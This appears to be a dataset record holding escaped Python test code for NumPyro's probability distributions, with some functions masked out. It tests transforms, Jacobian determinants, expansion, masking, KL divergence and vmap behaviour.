ordered_vector, constraints.positive_ordered_vector,\n constraints.l1_ball]:\n expected = np.linalg.slogdet(jax.jacobian(transform)(x))[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(transform.inv)(y))[1]\n elif constraint in [constraints.corr_cholesky, constraints.corr_matrix\n ]:\n vec_transform = lambda x: matrix_to_tril_vec(transform(x),\n diagonal=-1)\n y_tril = matrix_to_tril_vec(y, diagonal=-1)\n\n def inv_vec_transform(y):\n matrix = vec_to_tril_matrix(y, diagonal=-1)\n if constraint is constraints.corr_matrix:\n matrix = matrix + jnp.swapaxes(matrix, -2, -1\n ) + jnp.identity(matrix.shape[-1])\n return transform.inv(matrix)\n expected = np.linalg.slogdet(jax.jacobian(vec_transform)(x))[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(inv_vec_transform\n )(y_tril))[1]\n elif constraint in [constraints.lower_cholesky, constraints.\n scaled_unit_lower_cholesky, constraints.positive_definite,\n constraints.softplus_lower_cholesky]:\n vec_transform = lambda x: matrix_to_tril_vec(transform(x))\n y_tril = matrix_to_tril_vec(y)\n\n def inv_vec_transform(y):\n matrix = vec_to_tril_matrix(y)\n if constraint is constraints.positive_definite:\n matrix = matrix + jnp.swapaxes(matrix, -2, -1) - jnp.diag(\n jnp.diag(matrix))\n return transform.inv(matrix)\n expected = np.linalg.slogdet(jax.jacobian(vec_transform)(x))[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(inv_vec_transform\n )(y_tril))[1]\n else:\n expected = jnp.log(jnp.abs(grad(transform)(x)))\n inv_expected = jnp.log(jnp.abs(grad(transform.inv)(y)))\n assert_allclose(actual, expected, atol=1e-05, rtol=1e-05)\n assert_allclose(actual, -inv_expected, atol=1e-05, rtol=1e-05)\n\n\[email protected]('transform, event_shape', [(PermuteTransform(np.\n array([3, 0, 4, 1, 2])), (5,)), (PowerTransform(2.0), ()), (\n SoftplusTransform(), ()), (LowerCholeskyAffine(np.array([1.0, 2.0]), np\n .array([[0.6, 0.0], [1.5, 0.4]])), (2,)), (transforms.ComposeTransform(\n [biject_to(constraints.simplex), SimplexToOrderedTransform(0.0),\n biject_to(constraints.ordered_vector).inv]), (5,))])\[email protected]('batch_shape', [(), (1,), (3,), (6,), (3, 1), (1, \n 3), (5, 3)])\ndef test_bijective_transforms(transform, event_shape, batch_shape):\n shape = batch_shape + event_shape\n rng_key = random.PRNGKey(0)\n x = biject_to(transform.domain)(random.normal(rng_key, shape))\n y = transform(x)\n assert_array_equal(transform.codomain(y), jnp.ones(batch_shape))\n z = transform.inv(y)\n assert_allclose(x, z, atol=1e-06, rtol=0.0001)\n assert transform.inv.inv is transform\n assert transform.inv is transform.inv\n assert transform.domain is transform.inv.codomain\n assert transform.codomain is transform.inv.domain\n assert_array_equal(transform.domain(z), jnp.ones(batch_shape))\n actual = transform.log_abs_det_jacobian(x, y)\n assert_allclose(actual, -transform.inv.log_abs_det_jacobian(y, x))\n assert jnp.shape(actual) == batch_shape\n if len(shape) == transform.domain.event_dim:\n if len(event_shape) == 1:\n expected = np.linalg.slogdet(jax.jacobian(transform)(x))[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(transform.inv)(y))[1]\n else:\n expected = jnp.log(jnp.abs(grad(transform)(x)))\n inv_expected = jnp.log(jnp.abs(grad(transform.inv)(y)))\n assert_allclose(actual, expected, atol=1e-06)\n assert_allclose(actual, -inv_expected, atol=1e-06)\n\n\[email protected]('batch_shape', [(), (5,)])\ndef test_composed_transform(batch_shape):\n t1 = transforms.AffineTransform(0, 2)\n t2 = transforms.LowerCholeskyTransform()\n t = transforms.ComposeTransform([t1, t2, t1])\n assert t.domain.event_dim == 1\n assert t.codomain.event_dim == 2\n x = np.random.normal(size=batch_shape + (6,))\n y = t(x)\n log_det = t.log_abs_det_jacobian(x, y)\n assert log_det.shape == batch_shape\n expected_log_det = jnp.log(2) * 6 + t2.log_abs_det_jacobian(x * 2, y / 2\n ) + jnp.log(2) * 9\n assert_allclose(log_det, expected_log_det)\n\n\[email protected]('batch_shape', [(), (5,)])\ndef test_composed_transform_1(batch_shape):\n t1 = transforms.AffineTransform(0, 2)\n t2 = transforms.LowerCholeskyTransform()\n t = transforms.ComposeTransform([t1, t2, t2])\n assert t.domain.event_dim == 1\n assert t.codomain.event_dim == 3\n x = np.random.normal(size=batch_shape + (6,))\n y = t(x)\n log_det = t.log_abs_det_jacobian(x, y)\n assert log_det.shape == batch_shape\n z = t2(x * 2)\n expected_log_det = jnp.log(2) * 6 + t2.log_abs_det_jacobian(x * 2, z\n ) + t2.log_abs_det_jacobian(z, t2(z)).sum(-1)\n assert_allclose(log_det, expected_log_det)\n\n\[email protected]('batch_shape', [(), (5,)])\ndef test_simplex_to_order_transform(batch_shape):\n simplex = jnp.arange(5.0) / jnp.arange(5.0).sum()\n simplex = jnp.broadcast_to(simplex, batch_shape + simplex.shape)\n transform = SimplexToOrderedTransform()\n out = transform(simplex)\n assert out.shape == transform.forward_shape(simplex.shape)\n assert simplex.shape == transform.inverse_shape(out.shape)\n\n\[email protected]('batch_shape', [(), (5,)])\[email protected]('prepend_event_shape', [(), (4,)])\[email protected]('sample_shape', [(), (7,)])\ndef test_transformed_distribution(batch_shape, prepend_event_shape,\n sample_shape):\n base_dist = dist.Normal(0, 1).expand(batch_shape + prepend_event_shape +\n (6,)).to_event(1 + len(prepend_event_shape))\n t1 = transforms.AffineTransform(0, 2)\n t2 = transforms.LowerCholeskyTransform()\n d = dist.TransformedDistribution(base_dist, [t1, t2, t1])\n assert d.event_dim == 2 + len(prepend_event_shape)\n y = d.sample(random.PRNGKey(0), sample_shape)\n t = transforms.ComposeTransform([t1, t2, t1])\n x = t.inv(y)\n assert x.shape == sample_shape + base_dist.shape()\n log_prob = d.log_prob(y)\n assert log_prob.shape == sample_shape + batch_shape\n t_log_det = t.log_abs_det_jacobian(x, y)\n if prepend_event_shape:\n t_log_det = t_log_det.sum(-1)\n expected_log_prob = base_dist.log_prob(x) - t_log_det\n assert_allclose(log_prob, expected_log_prob, atol=1e-05)\n\n\[email protected]('transformed_dist', [dist.TransformedDistribution(\n dist.Normal(np.array([2.0, 3.0]), 1.0), transforms.ExpTransform()),\n dist.TransformedDistribution(dist.Exponential(jnp.ones(2)), [transforms\n .PowerTransform(0.7), transforms.AffineTransform(0.0, jnp.ones(2) * 3)])])\ndef test_transformed_distribution_intermediates(transformed_dist):\n sample, intermediates = transformed_dist.sample_with_intermediates(random\n .PRNGKey(1))\n assert_allclose(transformed_dist.log_prob(sample, intermediates),\n transformed_dist.log_prob(sample))\n\n\ndef test_transformed_transformed_distribution():\n loc, scale = -2, 3\n dist1 = dist.TransformedDistribution(dist.Normal(2, 3), transforms.\n PowerTransform(2.0))\n dist2 = dist.TransformedDistribution(dist1, transforms.AffineTransform(\n -2, 3))\n assert isinstance(dist2.base_dist, dist.Normal)\n assert len(dist2.transforms) == 2\n assert isinstance(dist2.transforms[0], transforms.PowerTransform)\n assert isinstance(dist2.transforms[1], transforms.AffineTransform)\n rng_key = random.PRNGKey(0)\n assert_allclose(loc + scale * dist1.sample(rng_key), dist2.sample(rng_key))\n intermediates = dist2.sample_with_intermediates(rng_key)\n assert len(intermediates) == 2\n\n\ndef _make_iaf(input_dim, hidden_dims, rng_key):\n arn_init, arn = AutoregressiveNN(input_dim, hidden_dims, param_dims=[1, 1])\n _, init_params = arn_init(rng_key, (input_dim,))\n return InverseAutoregressiveTransform(partial(arn, init_params))\n\n\[email protected]('ts', [[transforms.PowerTransform(0.7), transforms\n .AffineTransform(2.0, 3.0)], [transforms.ExpTransform()], [transforms.\n ComposeTransform([transforms.AffineTransform(-2, 3), transforms.\n ExpTransform()]), transforms.PowerTransform(3.0)], [_make_iaf(5,\n hidden_dims=[10], rng_key=random.PRNGKey(0)), transforms.\n PermuteTransform(jnp.arange(5)[::-1]), _make_iaf(5, hidden_dims=[10],\n rng_key=random.PRNGKey(1))]])\ndef test_compose_transform_with_intermediates(ts):\n transform = transforms.ComposeTransform(ts)\n x = random.normal(random.PRNGKey(2), (7, 5))\n y, intermediates = transform.call_with_intermediates(x)\n logdet = transform.log_abs_det_jacobian(x, y, intermediates)\n assert_allclose(y, transform(x))\n assert_allclose(logdet, transform.log_abs_det_jacobian(x, y))\n\n\[email protected]('x_dim, y_dim', [(3, 3), (3, 4)])\ndef test_unpack_transform(x_dim, y_dim):\n xy = np.random.randn(x_dim + y_dim)\n unpack_fn = lambda xy: {'x': xy[:x_dim], 'y': xy[x_dim:]}\n transform = transforms.UnpackTransform(unpack_fn)\n z = transform(xy)\n if x_dim == y_dim:\n with pytest.warns(UserWarning, match='UnpackTransform.inv'):\n t = transform.inv(z)\n else:\n t = transform.inv(z)\n assert_allclose(t, xy)\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS)\ndef test_generated_sample_distribution(jax_dist, sp_dist, params, N_sample=\n 100000, key=random.PRNGKey(11)):\n \"\"\"On samplers that we do not get directly from JAX, (e.g. we only get\n Gumbel(0,1) but also provide samplers for Gumbel(loc, scale)), also test\n agreement in the empirical distribution of generated samples between our\n samplers and those from SciPy.\n \"\"\"\n if jax_dist not in [dist.Gumbel]:\n pytest.skip(\n '{} sampling method taken from upstream, no need totest generated samples.'\n .format(jax_dist.__name__))\n jax_dist = jax_dist(*params)\n if sp_dist and not jax_dist.event_shape and not jax_dist.batch_shape:\n our_samples = jax_dist.sample(key, (N_sample,))\n ks_result = osp.kstest(our_samples, sp_dist(*params).cdf)\n assert ks_result.pvalue > 0.05\n\n\[email protected]('jax_dist, params, support', [(dist.\n BernoulliLogits, (5.0,), jnp.arange(2)), (dist.BernoulliProbs, (0.5,),\n jnp.arange(2)), (dist.BinomialLogits, (4.5, 10), jnp.arange(11)), (dist\n .BinomialProbs, (0.5, 11), jnp.arange(12)), (dist.BetaBinomial, (2.0, \n 0.5, 12), jnp.arange(13)), (dist.CategoricalLogits, (np.array([3.0, 4.0,\n 5.0]),), jnp.arange(3)), (dist.CategoricalProbs, (np.array([0.1, 0.5, \n 0.4]),), jnp.arange(3))])\[email protected]('batch_shape', [(5,), ()])\[email protected]('expand', [False, True])\ndef test_enumerate_support_smoke(jax_dist, params, support, batch_shape, expand\n ):\n p0 = jnp.broadcast_to(params[0], batch_shape + jnp.shape(params[0]))\n actual = jax_dist(p0, *params[1:]).enumerate_support(expand=expand)\n expected = support.reshape((-1,) + (1,) * len(batch_shape))\n if expand:\n expected = jnp.broadcast_to(expected, support.shape + batch_shape)\n assert_allclose(actual, expected)\n\n\ndef test_zero_inflated_enumerate_support():\n base_dist = dist.Bernoulli(0.5)\n d = dist.ZeroInflatedDistribution(base_dist, gate=0.5)\n assert d.has_enumerate_support\n assert_allclose(d.enumerate_support(), base_dist.enumerate_support())\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE)\[email protected]('prepend_shape', [(), (2, 3)])\[email protected]('sample_shape', [(), (4,)])\ndef test_expand(jax_dist, sp_dist, params, prepend_shape, sample_shape):\n jax_dist = jax_dist(*params)\n new_batch_shape = prepend_shape + jax_dist.batch_shape\n expanded_dist = jax_dist.expand(new_batch_shape)\n rng_key = random.PRNGKey(0)\n samples = expanded_dist.sample(rng_key, sample_shape)\n assert expanded_dist.batch_shape == new_batch_shape\n assert samples.shape == sample_shape + new_batch_shape + jax_dist.event_shape\n assert expanded_dist.log_prob(samples\n ).shape == sample_shape + new_batch_shape\n assert expanded_dist.expand((3,) + new_batch_shape).batch_shape == (3,\n ) + new_batch_shape\n if prepend_shape:\n with pytest.raises(ValueError, match=\n 'Cannot broadcast distribution of shape'):\n assert expanded_dist.expand((3,) + jax_dist.batch_shape)\n\n\[email protected]('base_shape', [(2, 1, 5), (3, 1), (2, 1, 1), (1, 1,\n 5)])\[email protected]('event_dim', [0, 1, 2, 3])\[email protected]('sample_shape', [(1000,), (1000, 7, 1), (1000, 1, 7)])\ndef test_expand_shuffle_regression(base_shape, event_dim, sample_shape):\n expand_shape = 2, 3, 5\n event_dim = min(event_dim, len(base_shape))\n loc = random.normal(random.PRNGKey(0), base_shape) * 10\n base_dist = dist.Normal(loc, 0.1).to_event(event_dim)\n expanded_dist = base_dist.expand(expand_shape[:len(expand_shape) -\n event_dim])\n samples = expanded_dist.sample(random.PRNGKey(1), sample_shape)\n expected_mean = jnp.broadcast_to(loc, sample_shape[1:] + expanded_dist.\n shape())\n assert_allclose(samples.mean(0), expected_mean, atol=0.1)\n\n\n<mask token>\n\n\ndef test_sine_bivariate_von_mises_sample_mean():\n loc = jnp.array([[2.0, -1.0], [-2, 1.0]])\n sine = SineBivariateVonMises(*loc, 5000, 5000, 0.0)\n samples = sine.sample(random.PRNGKey(0), (5000,))\n assert_allclose(_circ_mean(samples).T, loc, rtol=0.005)\n\n\[email protected]('batch_shape', [(), (4,)])\ndef test_polya_gamma(batch_shape, num_points=20000):\n d = dist.TruncatedPolyaGamma(batch_shape=batch_shape)\n rng_key = random.PRNGKey(0)\n x = jnp.linspace(1e-06, d.truncation_point, num_points)\n prob = d.truncation_point / num_points * jnp.exp(logsumexp(d.log_prob(x\n ), axis=-1))\n assert_allclose(prob, jnp.ones(batch_shape), rtol=0.0001)\n z = d.sample(rng_key, sample_shape=(3000,))\n mean = jnp.mean(z, axis=-1)\n assert_allclose(mean, 0.25 * jnp.ones(batch_shape), rtol=0.07)\n\n\[email protected]('extra_event_dims,expand_shape', [(0, (4, 3, 2, 1)\n ), (0, (4, 3, 2, 2)), (1, (5, 4, 3, 2)), (2, (5, 4, 3))])\ndef test_expand_reshaped_distribution(extra_event_dims, expand_shape):\n loc = jnp.zeros((1, 6))\n scale_tril = jnp.eye(6)\n d = dist.MultivariateNormal(loc, scale_tril=scale_tril)\n full_shape = 4, 1, 1, 1, 6\n reshaped_dist = d.expand([4, 1, 1, 1]).to_event(extra_event_dims)\n cut = 4 - extra_event_dims\n batch_shape, event_shape = full_shape[:cut], full_shape[cut:]\n assert reshaped_dist.batch_shape == batch_shape\n assert reshaped_dist.event_shape == event_shape\n large = reshaped_dist.expand(expand_shape)\n assert large.batch_shape == expand_shape\n assert large.event_shape == event_shape\n with pytest.raises((RuntimeError, ValueError)):\n reshaped_dist.expand(expand_shape + (3,))\n with pytest.raises((RuntimeError, ValueError)):\n large.expand(expand_shape[1:])\n\n\[email protected]('batch_shape, mask_shape', [((), ()), ((2,), ()),\n ((), (2,)), ((2,), (2,)), ((4, 2), (1, 2)), ((2,), (4, 2))])\[email protected]('event_shape', [(), (3,)])\ndef test_mask(batch_shape, event_shape, mask_shape):\n jax_dist = dist.Normal().expand(batch_shape + event_shape).to_event(len\n (event_shape))\n mask = dist.Bernoulli(0.5).sample(random.PRNGKey(0), mask_shape)\n if mask_shape == ():\n mask = bool(mask)\n samples = jax_dist.sample(random.PRNGKey(1))\n actual = jax_dist.mask(mask).log_prob(samples)\n assert_allclose(actual != 0, jnp.broadcast_to(mask, lax.\n broadcast_shapes(batch_shape, mask_shape)))\n\n\[email protected]('event_shape', [(), (4,), (2, 4)])\ndef test_mask_grad(event_shape):\n\n def f(x, data):\n base_dist = dist.Beta(jnp.exp(x), jnp.ones(event_shape)).to_event()\n mask = jnp.all(jnp.isfinite(data), tuple(-i - 1 for i in range(len(\n event_shape))))\n log_prob = base_dist.mask(mask).log_prob(data)\n assert log_prob.shape == data.shape[:len(data.shape) - len(event_shape)\n ]\n return log_prob.sum()\n data = np.array([[0.4, np.nan, 0.2, np.nan], [0.5, 0.5, 0.5, 0.5]])\n log_prob, grad = jax.value_and_grad(f)(1.0, data)\n assert jnp.isfinite(grad) and jnp.isfinite(log_prob)\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\ndef test_dist_pytree(jax_dist, sp_dist, params):\n\n def f(x):\n return jax_dist(*params)\n if jax_dist is _ImproperWrapper:\n pytest.skip('Cannot flattening ImproperUniform')\n if jax_dist is dist.EulerMaruyama:\n pytest.skip(\"EulerMaruyama doesn't define flatten/unflatten\")\n jax.jit(f)(0)\n lax.map(f, np.ones(3))\n expected_dist = f(0)\n actual_dist = jax.jit(f)(0)\n expected_sample = expected_dist.sample(random.PRNGKey(0))\n actual_sample = actual_dist.sample(random.PRNGKey(0))\n expected_log_prob = expected_dist.log_prob(expected_sample)\n actual_log_prob = actual_dist.log_prob(actual_sample)\n assert_allclose(actual_sample, expected_sample, rtol=1e-06)\n assert_allclose(actual_log_prob, expected_log_prob, rtol=2e-06)\n\n\n<mask token>\n\n\ndef test_expand_no_unnecessary_batch_shape_expansion():\n for arg in (jnp.array(1.0), jnp.ones((2,)), jnp.ones((2, 2))):\n d = dist.Normal(arg, arg).expand([10, 3, *arg.shape])\n roundtripped_d = type(d).tree_unflatten(*d.tree_flatten()[::-1])\n assert d.batch_shape == roundtripped_d.batch_shape\n assert d.base_dist.batch_shape == roundtripped_d.base_dist.batch_shape\n assert d.base_dist.event_shape == roundtripped_d.base_dist.event_shape\n assert jnp.allclose(d.base_dist.loc, roundtripped_d.base_dist.loc)\n assert jnp.allclose(d.base_dist.scale, roundtripped_d.base_dist.scale)\n\n def bs(arg):\n return dist.Normal(arg, arg).expand([10, 3, *arg.shape])\n d = bs(arg)\n dj = jax.jit(bs)(arg)\n assert isinstance(d, dist.ExpandedDistribution)\n assert isinstance(dj, dist.ExpandedDistribution)\n assert d.batch_shape == dj.batch_shape\n assert d.base_dist.batch_shape == dj.base_dist.batch_shape\n assert d.base_dist.event_shape == dj.base_dist.event_shape\n assert jnp.allclose(d.base_dist.loc, dj.base_dist.loc)\n assert jnp.allclose(d.base_dist.scale, dj.base_dist.scale)\n\n\[email protected]('batch_shape', [(), (4,), (2, 3)], ids=str)\ndef test_kl_delta_normal_shape(batch_shape):\n v = np.random.normal(size=batch_shape)\n loc = np.random.normal(size=batch_shape)\n scale = np.exp(np.random.normal(size=batch_shape))\n p = dist.Delta(v)\n q = dist.Normal(loc, scale)\n assert kl_divergence(p, q).shape == batch_shape\n\n\ndef test_kl_delta_normal():\n v = np.random.normal()\n loc = np.random.normal()\n scale = np.exp(np.random.normal())\n p = dist.Delta(v, 10.0)\n q = dist.Normal(loc, scale)\n assert_allclose(kl_divergence(p, q), 10.0 - q.log_prob(v))\n\n\[email protected]('batch_shape', [(), (4,), (2, 3)], ids=str)\[email protected]('event_shape', [(), (4,), (2, 3)], ids=str)\ndef test_kl_independent_normal(batch_shape, event_shape):\n shape = batch_shape + event_shape\n p = dist.Normal(np.random.normal(size=shape), np.exp(np.random.normal(\n size=shape)))\n q = dist.Normal(np.random.normal(size=shape), np.exp(np.random.normal(\n size=shape)))\n actual = kl_divergence(dist.Independent(p, len(event_shape)), dist.\n Independent(q, len(event_shape)))\n expected = sum_rightmost(kl_divergence(p, q), len(event_shape))\n assert_allclose(actual, expected)\n\n\[email protected]('batch_shape', [(), (4,), (2, 3)], ids=str)\[email protected]('event_shape', [(), (4,), (2, 3)], ids=str)\ndef test_kl_expanded_normal(batch_shape, event_shape):\n shape = batch_shape + event_shape\n p = dist.Normal(np.random.normal(), np.exp(np.random.normal())).expand(\n shape)\n q = dist.Normal(np.random.normal(), np.exp(np.random.normal())).expand(\n shape)\n actual = kl_divergence(dist.Independent(p, len(event_shape)), dist.\n Independent(q, len(event_shape)))\n expected = sum_rightmost(kl_divergence(p, q), len(event_shape))\n assert_allclose(actual, expected)\n\n\[email protected]('shape', [(), (4,), (2, 3)], ids=str)\[email protected]('p_dist, q_dist', [(dist.Beta, dist.Beta), (dist.\n Gamma, dist.Gamma), (dist.Kumaraswamy, dist.Beta), (dist.Normal, dist.\n Normal), (dist.Weibull, dist.Gamma)])\ndef test_kl_univariate(shape, p_dist, q_dist):\n\n def make_dist(dist_class):\n params = {}\n for k, c in dist_class.arg_constraints.items():\n if c is constraints.real:\n params[k] = np.random.normal(size=shape)\n elif c is constraints.positive:\n params[k] = np.exp(np.random.normal(size=shape))\n else:\n raise ValueError(f'Missing pattern for param {k}.')\n d = dist_class(**params)\n if dist_class is dist.Kumaraswamy:\n d.KL_KUMARASWAMY_BETA_TAYLOR_ORDER = 1000\n return d\n p = make_dist(p_dist)\n q = make_dist(q_dist)\n actual = kl_divergence(p, q)\n x = p.sample(random.PRNGKey(0), (10000,)).copy()\n expected = jnp.mean(p.log_prob(x) - q.log_prob(x), 0)\n assert_allclose(actual, expected, rtol=0.05)\n\n\[email protected]('shape', [(4,), (2, 3)], ids=str)\ndef test_kl_dirichlet_dirichlet(shape):\n p = dist.Dirichlet(np.exp(np.random.normal(size=shape)))\n q = dist.Dirichlet(np.exp(np.random.normal(size=shape)))\n actual = kl_divergence(p, q)\n x = p.sample(random.PRNGKey(0), (10000,)).copy()\n expected = jnp.mean(p.log_prob(x) - q.log_prob(x), 0)\n assert_allclose(actual, expected, rtol=0.05)\n\n\ndef test_vmapped_binomial_p0():\n\n def sample_binomial_withp0(key):\n n = 2 * (random.uniform(key) > 0.5)\n _, key = random.split(key)\n return dist.Binomial(total_count=n, probs=0).sample(key)\n jax.vmap(sample_binomial_withp0)(random.split(random.PRNGKey(0), 1))\n\n\n<mask token>\n\n\ndef _allclose_or_equal(a1, a2):\n if isinstance(a1, np.ndarray):\n return np.allclose(a2, a1)\n elif isinstance(a1, jnp.ndarray):\n return jnp.allclose(a2, a1)\n elif isinstance(a1, csr_matrix):\n return np.allclose(a2.todense(), a1.todense())\n else:\n return a2 == a1 or a2 is a1\n\n\ndef _tree_equal(t1, t2):\n t = jax.tree_util.tree_map(_allclose_or_equal, t1, t2)\n return jnp.all(jax.flatten_util.ravel_pytree(t)[0])\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\ndef test_vmap_dist(jax_dist, sp_dist, params):\n param_names = list(inspect.signature(jax_dist).parameters.keys())\n vmappable_param_idxs = _get_vmappable_dist_init_params(jax_dist)\n vmappable_param_idxs = vmappable_param_idxs[:len(params)]\n if len(vmappable_param_idxs) == 0:\n return\n\n def make_jax_dist(*params):\n return jax_dist(*params)\n\n def sample(d: dist.Distribution):\n return d.sample(random.PRNGKey(0))\n d = make_jax_dist(*params)\n if isinstance(d, _SparseCAR) and d.is_sparse:\n return\n in_out_axes_cases = [(tuple(0 if i in vmappable_param_idxs else None for\n i in range(len(params))), 0), *(([(0 if i == idx else None) for i in\n range(len(params))], 0) for idx in vmappable_param_idxs if params[\n idx] is not None), *(([(0 if i == idx else None) for i in range(len\n (params))], vmap_over(d, **{param_names[idx]: 0})) for idx in\n vmappable_param_idxs if params[idx] is not None), *(([(1 if i ==\n idx else None) for i in range(len(params))], vmap_over(d, **{\n param_names[idx]: 1})) for idx in vmappable_param_idxs if \n isinstance(params[idx], jnp.ndarray) and jnp.array(params[idx]).\n ndim > 0 and jax_dist is not _GeneralMixture)]\n for in_axes, out_axes in in_out_axes_cases:\n batched_params = [(jax.tree_map(lambda x: jnp.expand_dims(x, ax),\n arg) if isinstance(ax, int) else arg) for arg, ax in zip(params,\n in_axes)]\n d = make_jax_dist(*params)\n batched_d = jax.vmap(make_jax_dist, in_axes=in_axes, out_axes=out_axes\n )(*batched_params)\n eq = vmap(lambda x, y: _tree_equal(x, y), in_axes=(out_axes, None))(\n batched_d, d)\n assert eq == jnp.array([True])\n samples_dist = sample(d)\n samples_batched_dist = jax.vmap(sample, in_axes=(out_axes,))(batched_d)\n assert samples_batched_dist.shape == (1, *samples_dist.shape)\n\n\ndef test_multinomial_abstract_total_count():\n probs = jnp.array([0.2, 0.5, 0.3])\n key = random.PRNGKey(0)\n\n def f(x):\n total_count = x.sum(-1)\n return dist.Multinomial(total_count, probs=probs, total_count_max=10\n ).sample(key)\n x = dist.Multinomial(10, probs).sample(key)\n y = jax.jit(f)(x)\n assert_allclose(x, y, rtol=1e-06)\n\n\ndef test_normal_log_cdf():\n loc = jnp.array([[0.0, -10.0, 20.0]])\n scale = jnp.array([[1, 5, 7]])\n values = jnp.linspace(-5, 5, 100).reshape(-1, 1)\n numpyro_log_cdf = dist.Normal(loc=loc, scale=scale).log_cdf(values)\n numpyro_cdf = dist.Normal(loc=loc, scale=scale).cdf(values)\n jax_log_cdf = jax_norm.logcdf(loc=loc, scale=scale, x=values)\n assert_allclose(numpyro_log_cdf, jax_log_cdf)\n assert_allclose(jnp.exp(numpyro_log_cdf), numpyro_cdf, rtol=1e-06)\n\n\[email protected]('value', [-15.0, jnp.array([[-15.0], [-10.0], [-\n 5.0]]), jnp.array([[[-15.0], [-10.0], [-5.0]], [[-14.0], [-9.0], [-4.0]]])]\n )\ndef test_truncated_normal_log_prob_in_tail(value):\n loc = 1.35\n scale = jnp.geomspace(0.01, 1, 10)\n low, high = -20, -1.0\n a, b = (low - loc) / scale, (high - loc) / scale\n numpyro_log_prob = dist.TruncatedNormal(loc, scale, low=low, high=high\n ).log_prob(value)\n jax_log_prob = jax_truncnorm.logpdf(value, loc=loc, scale=scale, a=a, b=b)\n assert_allclose(numpyro_log_prob, jax_log_prob, rtol=1e-06)\n\n\ndef test_sample_truncated_normal_in_tail():\n tail_dist = dist.TruncatedNormal(loc=0, scale=1, low=-16, high=-15)\n samples = tail_dist.sample(random.PRNGKey(0), sample_shape=(10000,))\n assert ~jnp.isinf(samples).any()\n\n\[email protected]_custom_prng()\ndef test_jax_custom_prng():\n samples = dist.Normal(0, 5).sample(random.PRNGKey(0), sample_shape=(1000,))\n assert ~jnp.isinf(samples).any()\n",
"step-5": "# Copyright Contributors to the Pyro project.\n# SPDX-License-Identifier: Apache-2.0\n\nfrom collections import namedtuple\nfrom functools import partial\nimport inspect\nfrom itertools import product\nimport math\nimport os\n\nimport numpy as np\nfrom numpy.testing import assert_allclose, assert_array_equal\nimport pytest\nimport scipy\nfrom scipy.sparse import csr_matrix\nimport scipy.stats as osp\n\nimport jax\nfrom jax import grad, lax, vmap\nimport jax.numpy as jnp\nimport jax.random as random\nfrom jax.scipy.special import expit, logsumexp\nfrom jax.scipy.stats import norm as jax_norm, truncnorm as jax_truncnorm\n\nimport numpyro.distributions as dist\nfrom numpyro.distributions import (\n SineBivariateVonMises,\n constraints,\n kl_divergence,\n transforms,\n)\nfrom numpyro.distributions.batch_util import vmap_over\nfrom numpyro.distributions.discrete import _to_probs_bernoulli, _to_probs_multinom\nfrom numpyro.distributions.flows import InverseAutoregressiveTransform\nfrom numpyro.distributions.gof import InvalidTest, auto_goodness_of_fit\nfrom numpyro.distributions.transforms import (\n LowerCholeskyAffine,\n PermuteTransform,\n PowerTransform,\n SimplexToOrderedTransform,\n SoftplusTransform,\n biject_to,\n)\nfrom numpyro.distributions.util import (\n matrix_to_tril_vec,\n multinomial,\n signed_stick_breaking_tril,\n sum_rightmost,\n vec_to_tril_matrix,\n)\nfrom numpyro.nn import AutoregressiveNN\n\nTEST_FAILURE_RATE = 2e-5 # For all goodness-of-fit tests.\n\n\ndef my_kron(A, B):\n D = A[..., :, None, :, None] * B[..., None, :, None, :]\n ds = D.shape\n newshape = (*ds[:-4], ds[-4] * ds[-3], ds[-2] * ds[-1])\n return D.reshape(newshape)\n\n\ndef _identity(x):\n return x\n\n\ndef _circ_mean(angles):\n return jnp.arctan2(\n jnp.mean(jnp.sin(angles), axis=0), jnp.mean(jnp.cos(angles), axis=0)\n )\n\n\ndef sde_fn1(x, _):\n lam = 0.1\n sigma2 = 0.1\n return lam * x, sigma2\n\n\ndef sde_fn2(xy, _):\n tau, a = 2.0, 1.1\n x, y = xy[0], xy[1]\n dx = tau * (x - x**3.0 / 3.0 + y)\n dy = (1.0 / tau) * (a - x)\n dxy = jnp.vstack([dx, dy]).reshape(xy.shape)\n\n sigma2 = 0.1\n return dxy, sigma2\n\n\nclass T(namedtuple(\"TestCase\", [\"jax_dist\", \"sp_dist\", \"params\"])):\n def __new__(cls, jax_dist, *params):\n sp_dist = get_sp_dist(jax_dist)\n return super(cls, T).__new__(cls, jax_dist, sp_dist, params)\n\n\ndef _mvn_to_scipy(loc, cov, prec, tril):\n jax_dist = dist.MultivariateNormal(loc, cov, prec, tril)\n mean = jax_dist.mean\n cov = jax_dist.covariance_matrix\n return osp.multivariate_normal(mean=mean, cov=cov)\n\n\ndef _multivariate_t_to_scipy(df, loc, tril):\n if scipy.__version__ < \"1.6.0\":\n pytest.skip(\n \"Multivariate Student-T distribution is not available in scipy < 1.6\"\n )\n jax_dist = dist.MultivariateStudentT(df, loc, tril)\n mean = jax_dist.mean\n cov = jax_dist.covariance_matrix\n return osp.multivariate_t(loc=mean, shape=cov, df=df)\n\n\ndef _lowrank_mvn_to_scipy(loc, cov_fac, cov_diag):\n jax_dist = dist.LowRankMultivariateNormal(loc, cov_fac, cov_diag)\n mean = jax_dist.mean\n cov = jax_dist.covariance_matrix\n return osp.multivariate_normal(mean=mean, cov=cov)\n\n\ndef _truncnorm_to_scipy(loc, scale, low, high):\n if low is None:\n a = -np.inf\n else:\n a = (low - loc) / scale\n if high is None:\n b = np.inf\n else:\n b = (high - loc) / scale\n return osp.truncnorm(a, b, loc=loc, scale=scale)\n\n\ndef _TruncatedNormal(loc, scale, low, high):\n return dist.TruncatedNormal(loc=loc, scale=scale, low=low, high=high)\n\n\ndef _TruncatedCauchy(loc, scale, low, high):\n return dist.TruncatedCauchy(loc=loc, scale=scale, low=low, high=high)\n\n\n_TruncatedNormal.arg_constraints = {}\n_TruncatedNormal.reparametrized_params = []\n_TruncatedNormal.infer_shapes = lambda *args: (lax.broadcast_shapes(*args), ())\n\n\nclass SineSkewedUniform(dist.SineSkewed):\n def __init__(self, skewness, **kwargs):\n lower, upper = (np.array([-math.pi, -math.pi]), np.array([math.pi, math.pi]))\n base_dist = dist.Uniform(lower, upper, **kwargs).to_event(lower.ndim)\n super().__init__(base_dist, skewness, 